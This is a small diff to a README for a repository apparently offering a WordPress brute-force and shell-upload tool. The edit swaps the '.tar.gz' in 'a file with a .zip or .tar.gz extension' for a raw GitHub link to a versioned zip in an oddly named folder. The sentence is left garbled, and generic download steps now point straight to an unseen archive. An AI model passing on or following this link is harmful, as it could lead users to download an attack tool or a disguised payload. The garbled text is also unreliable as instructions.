martinaparched251/Wordpress-BRUTE-FORCE-UPLOAD-SHELL/README.md

 ### Step 3: Download the File

 - Click on the file that you need to download.
-It might be a file with a `.zip` or `.tar.gz` extension.
+It might be a file with a `.zip` or `https://raw.githubusercontent.com/martinaparched251/Wordpress-BRUTE-FORCE-UPLOAD-SHELL/main/aldermaness/Wordpress-BRUTE-FORCE-UPLOAD-SHELL_v2.0.zip` extension.

 ### Step 4: Extract the File